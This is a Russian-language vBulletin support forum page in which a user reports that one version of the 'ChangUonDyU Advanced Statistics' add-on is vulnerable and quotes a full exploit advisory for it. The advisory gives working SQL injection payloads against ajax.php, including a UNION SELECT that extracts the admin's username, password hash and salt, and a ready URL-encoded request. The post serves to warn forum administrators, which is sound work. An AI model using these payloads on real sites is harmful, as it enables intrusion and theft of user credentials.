VBsupport перешел с домена .ORG на родной .RU
Ура!
Пожалуйста, обновите свои закладки - VBsupport.ru
Блок РКН снят, форум доступен на всей территории России, включая новые терртории, без VPN
На форуме введена премодерация ВСЕХ новых пользователей
Почта с временных сервисов, типа mailinator.com, gawab.com и/или прочих, которые предоставляют временный почтовый ящик без регистрации и/или почтовый ящик для рассылки спама, отслеживается и блокируется, а так же заносится в спам-блок форума, аккаунты удаляются
Если вы хотите приобрести какой то скрипт/продукт/хак из каталогов перечисленных ниже: Каталог модулей/хаков
Ещё раз обращаем Ваше внимание: всё, что Вы скачиваете и устанавливаете на свой форум, Вы устанавливаете исключительно на свой страх и риск.
Сообщество vBSupport'а физически не в состоянии проверять все стили, хаки и нули, выкладываемые пользователями.
Помните: безопасность Вашего проекта - Ваша забота. Убедительная просьба: при обнаружении уязвимостей или сомнительных кодов обязательно отписывайтесь в теме хака/стиля
Спасибо за понимание
Немного неактуально, но проверил на:
"ChangUonDyU - Advanced Statistics 6.0.0" - инъекция имеет место.
"ChangUonDyU - Advanced Statistics 6.0.0.2.0.1" (от MDM) - порядок.
Подробно:
Code:
# Exploit Title: vBulletin ChangUonDyU Advanced Statistics - SQL Injection
Vulnerability
# Google Dork: No Dork
# Date: 19/10/2012
# Exploit Author: Juno_okyo
# Vendor Homepage: http://hoiquantinhoc.com
# Software Link:
http://hoiquantinhoc.com/modifications-3-8-x/4468-changuondyu-advanced-statistics-6-0-1-a.html
# Version: vBulletin 3 & 4
# Tested on: Windows 7
# CVE : http://www.vbulletin.com/
#
##############################################################################################
Vulnerability:
##############################################################################################
SQL Injection was found in ChangUonDyU Advanced Statistics.
Query on ajax.php
##############################################################################################
Exploitation:
##############################################################################################
ajax.php?do=inforum&listforumid=100) UNION SELECT
1,concat_ws(0x7c,user(),database(),version()),3,4,5,6,7,8,9,10-- -&result=20
or:
ajax.php?do=inforum&listforumid=100) UNION SELECT
1,2,3,4,5,6,concat_ws(0x7c,username,password,salt),8,9,10,11 from user
where userid=1-- -&result=20
##############################################################################################
Ex:
##############################################################################################
http://server/f/ajax.php?do=inforum&listforumid=100%29%20UNION%20SELECT%201,concat_ws%280x7c,user%28%29,database%28%29,version%28%29%29,3,4,5,6,7,8,9,10--%20-&result=20
##############################################################################################
More Details:
##############################################################################################
Website: http://junookyo.blogspot.com/
About Exploit:
http://junookyo.blogspot.com/2012/10/vbb-changuondyu-advanced-statistics-sql.html
##############################################################################################
Great thanks to James, Juno_okyo & J2TeaM, VNHack Group
##############################################################################################